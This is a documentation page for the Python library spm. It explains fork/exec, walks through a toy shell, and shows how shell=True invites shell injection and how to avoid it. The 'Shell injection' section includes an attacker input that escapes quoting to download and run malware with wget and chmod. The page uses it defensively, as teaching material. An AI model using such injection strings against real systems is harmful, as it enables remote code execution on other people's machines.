Why is spm secure?

There are two ways to execute subprocesses in Python:

  • The first way is by passing a string to a shell. (Popen('string', shell=True))
  • The second one is by passing a list of arguments to exec(). (Popen([arguments]))
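
The difference between the two forms is easiest to see with an argument that contains a shell metacharacter. The following is a minimal sketch using only the standard subprocess module. The helper names run_with_shell and run_without_shell are hypothetical, and a POSIX system with an echo command is assumed.

```python
import subprocess


def run_with_shell(text):
    # The whole string is handed to /bin/sh, which treats ';' as a
    # command separator.
    return subprocess.check_output('echo ' + text, shell=True).decode()


def run_without_shell(text):
    # The list goes straight to exec(): text is one literal argument.
    return subprocess.check_output(['echo', text]).decode()


if __name__ == '__main__':
    tricky = 'a; echo b'
    print(repr(run_with_shell(tricky)))     # The shell runs two commands
    print(repr(run_without_shell(tricky)))  # echo receives one argument
```

In the first call the shell decides where one command ends and the next begins. In the second call nothing interprets the argument at all.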

How are subprocesses executed?

Subprocesses are executed with two system calls: fork() and exec().

  • fork() creates a copy of the current process as a child process
  • exec() replaces the current process with another program

Here’s how fork works:

# This is going to print "Hello" twice
import os
os.fork()  # From here on, two processes run the rest of the script
print("Hello")

The previous script will print “Hello” twice. You might be wondering “What is the point?”

For example, this allows you to run an action in the background (like in another thread, but without the Python GIL):

import os
import sys

def run_in_background(action):
    pid = os.fork()
    if pid > 0:  # Parent process
        return  # Return to the code calling this function
    else:
        try:
            action()
        finally:
            # Exit the child process. You don't want it to return to the
            # calling code and execute the following actions twice.
            sys.exit()

On the other hand, exec() allows you to execute a command in place of the current process:

import os

# The os module exposes several exec*() functions which all do
# the same thing with a different interface.
# execv() is one of them.
os.execv('/usr/bin/ls', ['ls', '/tmp/'])
print("This will never be printed")

Running this Python script does exactly the same thing as running ls /tmp/ in your shell (assuming your shell resolves ls to /usr/bin/ls).

Notice that the code after execv() is never executed, because the whole process is replaced by /usr/bin/ls.

You can probably see where this is going. Here’s how subprocesses are executed:

import os

# This code is actually a lot more complex, because it includes logic to
# handle input/output.
def execute_subprocess(arguments):
    if os.fork() != 0:  # Parent process
        return
    else:  # Child process
        program = arguments[0]
        os.execv(program, arguments)
        # No need to sys.exit() since exec() never returns

How does a shell work?

To understand how a shell works, we’ll implement a very simple one.

A shell parses each line, then calls fork() and exec() with the arguments given in the line. It looks up commands in the directories listed in the PATH environment variable.
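
The parsing step can be illustrated on its own with shlex.split() from the standard library, which splits a line the way a POSIX shell tokenizes it, including quotes. This is a minimal sketch; the wrapper name parse and the file name notes.txt are hypothetical.

```python
import shlex


def parse(line):
    """Split a command line into an argument list, honouring quotes."""
    return shlex.split(line)


if __name__ == '__main__':
    print(parse('ls -l /tmp'))
    # The quoted part stays together as a single argument.
    print(parse('grep "hello world" notes.txt'))
```

The first element of the resulting list is the command to look up, and the whole list is what gets passed to exec().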

For simplicity our shell won’t support any environment variable manipulation.

#!/usr/bin/env python3
# Copyright (C) 2015 Antoine Catton
# Licensed under WTFPL <http://www.wtfpl.net/>

import shlex
import os
import sys

NORMAL_PIDWAIT = 0  # No special options for os.waitpid(): block until the child exits


def lookup(command):
    """
    Lookup a command in PATH. For example::

        >>> lookup('ls')
        '/usr/bin/ls'
        >>> lookup('usermod')
        '/usr/sbin/usermod'
        >>> lookup('foobar')
        Traceback (most recent call last):
          File "<stdin>", line 1, in <module>
        ValueError: Invalid command

    This function is incredibly dumb, and does not search for an executable
    file.
    """
    for path in os.environ.get('PATH', '').split(':'):
        fname = os.path.join(path, command)
        if os.path.exists(fname):
            return fname
    raise ValueError("Invalid command")


def run(line):
    """
    Run a shell line: run('ls /tmp') will execv('/usr/bin/ls', ['ls', '/tmp'])
    """
    arguments = shlex.split(line)
    path = lookup(arguments[0])  # Look up the first argument in PATH
    execute(path, arguments)


def execute(path, arguments):
    """
    Wrapper around execv():

    * fork()s before exec()ing (in order to run the command in a subprocess)
    * wait for the subprocess to finish before returning (blocks the parent
      process)

    This is **hyper** simplistic. This *does not* handle **many** edge cases.

    *DO NOT DO THIS*: subprocess.check_call() does it better, and handles
    edge cases.
    """
    pid = os.fork()
    if pid == 0:
        try:
            os.execv(path, arguments)
        finally:
            sys.exit(1)  # In case path is not executable
    else:
        try:
            # Wait for subprocess to finish
            os.waitpid(pid, NORMAL_PIDWAIT)
        except OSError:
            pass  # The subprocess had already finished
        return

if __name__ == '__main__':

    while True:
        line = input('$ ')

        if line.strip() == 'exit':  # Wants to exit the shell
            break

        if not line.strip():  # Nothing to run on an empty line
            continue

        run(line)
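
As its docstring says, lookup() does not check that the file it finds is executable. For comparison, the standard library’s shutil.which() performs a PATH search that does. Here is a minimal sketch; the wrapper name lookup_executable is hypothetical, and it assumes a POSIX system where sh is on the PATH.

```python
import os
import shutil


def lookup_executable(command):
    """Find command in PATH, accepting only executable files."""
    fname = shutil.which(command)
    if fname is None:
        raise ValueError("Invalid command")
    return fname


if __name__ == '__main__':
    path = lookup_executable('sh')
    print(path, os.access(path, os.X_OK))
```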

Shell injection

In order to do piping easily, most people use subprocess.Popen(shell=True).

Let’s take this example:

import subprocess

# Type hints (checked by mypy) are only here for documentation
def does_url_contain(url: str, word: str) -> bool:
    returncode = subprocess.call('curl "{}" | grep "{}"'.format(url, word), shell=True)
    return returncode == 0

Let’s imagine you have a web form, in which you ask users to enter this data:

+-------------------------------------------+
|    +--------------------------------------|
| <  |  http://www.example.com/form/       ||
|    +--------------------------------------|
+-------------------------------------------+
|                                           |
|            +----------------------+       |
|      Url:  |                      |       |
|            +----------------------+       |
|                                           |
|            +----------------------+       |
|      Word: |                      |       |
|            +----------------------+       |
|                                           |
+-------------------------------------------+

An attacker could enter the following URL:

" || wget http://example.net/malware && chmod a+x malware && ./malware #

This would execute the command:

curl "" || wget http://example.net/malware && chmod a+x malware && ./malware #" | grep ""

The shell treats everything after the # as a comment, so the attacker would be able to download and execute malware on your system.

In order to mitigate this kind of attack, does_url_contain should have been implemented this way:

import subprocess
import shlex

def does_url_contain(unsafe_url: str, unsafe_word: str) -> bool:
    url, word = shlex.quote(unsafe_url), shlex.quote(unsafe_word)
    returncode = subprocess.call('curl {} | grep {}'.format(url, word), shell=True)
    return returncode == 0
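
To see what shlex.quote() does to the attacker’s input, the command line can be built without running it. This is a minimal sketch; build_command is a hypothetical helper that mirrors the string formatting in does_url_contain, and shlex.split() stands in for the shell’s tokenizer.

```python
import shlex

PAYLOAD = '" || wget http://example.net/malware && chmod a+x malware && ./malware #'


def build_command(unsafe_url, unsafe_word):
    """Build the shell line, quoting both user-supplied values."""
    url, word = shlex.quote(unsafe_url), shlex.quote(unsafe_word)
    return 'curl {} | grep {}'.format(url, word)


if __name__ == '__main__':
    command = build_command(PAYLOAD, 'python')
    print(command)
    # Splitting the line back into tokens shows that the payload stays a
    # single argument to curl instead of becoming extra commands.
    print(shlex.split(command))
```

The quoted payload is wrapped in single quotes, so the shell passes it to curl as one (invalid) URL.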

Why spm isn’t vulnerable to shell injection by default

In order to prevent shell injection, you have to sanitize every piece of data passed to the shell. This requires discipline, and even disciplined humans make errors.

On the other hand, spm.run() doesn’t allow for shell injection, since it requires arguments to be passed as a list, which is handed directly to exec().
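
The same list-based idea can be sketched with the standard subprocess module, to show that piping does not require a shell. This is not spm’s API: pipe_matches is a hypothetical helper, grep is assumed to be installed, and the -q flag (which silences grep’s output) is a change from the curl | grep example.

```python
import subprocess


def pipe_matches(producer, word):
    """Return True if the output of producer contains word.

    producer is an argument list such as ['curl', url]; no shell is involved.
    """
    first = subprocess.Popen(producer, stdout=subprocess.PIPE)
    # '-e' marks the next argument as the pattern, even if it starts with '-'.
    second = subprocess.Popen(['grep', '-q', '-e', word], stdin=first.stdout)
    first.stdout.close()  # Let the producer get SIGPIPE if grep exits early
    returncode = second.wait()
    first.wait()
    return returncode == 0


if __name__ == '__main__':
    print(pipe_matches(['echo', 'hello world'], 'world'))
    # Shell metacharacters are just part of the pattern here.
    print(pipe_matches(['echo', 'hello world'], '"; echo pwned #'))
```

Because each program receives its arguments as a list, there is nothing to quote and nothing for an attacker to break out of.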

The only way to create shell injection would be to call spm this way (which defeats the purpose of spm):

import spm

def subcommand(argument): # XXX: This is wrong!!
    return spm.run('bash', '-c', 'subcommand {}'.format(argument))

# The right way should be:
import functools
subcommand = functools.partial(spm.run, 'subcommand')

spm is shellshock proof

Do you remember Shellshock? Code using subprocess.Popen(shell=True) could have been vulnerable since, under the hood, it calls /bin/sh -c 'your string', and /bin/sh is bash on many systems.

spm code wouldn’t have been vulnerable (unless it called bash explicitly, of course).

You still need spm even though you don’t have any user data

You might be wondering “why would I need spm if I don’t have any user input?”

It is still recommended to use spm: since arguments are passed as a list, spaces and other special characters (in file names, for example) need no escaping.

It also provides a more Pythonic API.

Environment propagation opt-in

By default, spm doesn’t propagate the environment to the subprocess. The user has to opt in.

This prevents information leakage. If the environment were propagated by default, spm run from a CGI script could leak information such as the user’s IP address and cookies, which CGI passes through environment variables.

This also improves security: a variable such as LD_PRELOAD could otherwise be passed down to the subprocess and make it execute arbitrary code.

Of course, the environment can always be propagated, but think twice before doing so.
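
The effect of not propagating the environment can be sketched with the standard subprocess module, which inherits the parent’s environment unless an env mapping is given. This is not spm’s API: run_child and the SESSION_COOKIE variable are hypothetical names chosen for illustration.

```python
import os
import subprocess
import sys

CHILD_CODE = 'import os; print(os.environ.get("SESSION_COOKIE"))'


def run_child(env):
    """Run a child Python process with exactly the given environment."""
    output = subprocess.check_output([sys.executable, '-c', CHILD_CODE], env=env)
    return output.decode().strip()


if __name__ == '__main__':
    os.environ['SESSION_COOKIE'] = 'secret'  # Pretend a CGI server set this
    # Opt in to a single variable instead of the whole environment.
    allowed = {'PATH': os.environ.get('PATH', '')}
    print(run_child(allowed))           # The child does not see the cookie
    print(run_child(dict(os.environ)))  # Full propagation leaks it
```

Passing an explicit allowlist keeps the decision about each variable visible at the call site.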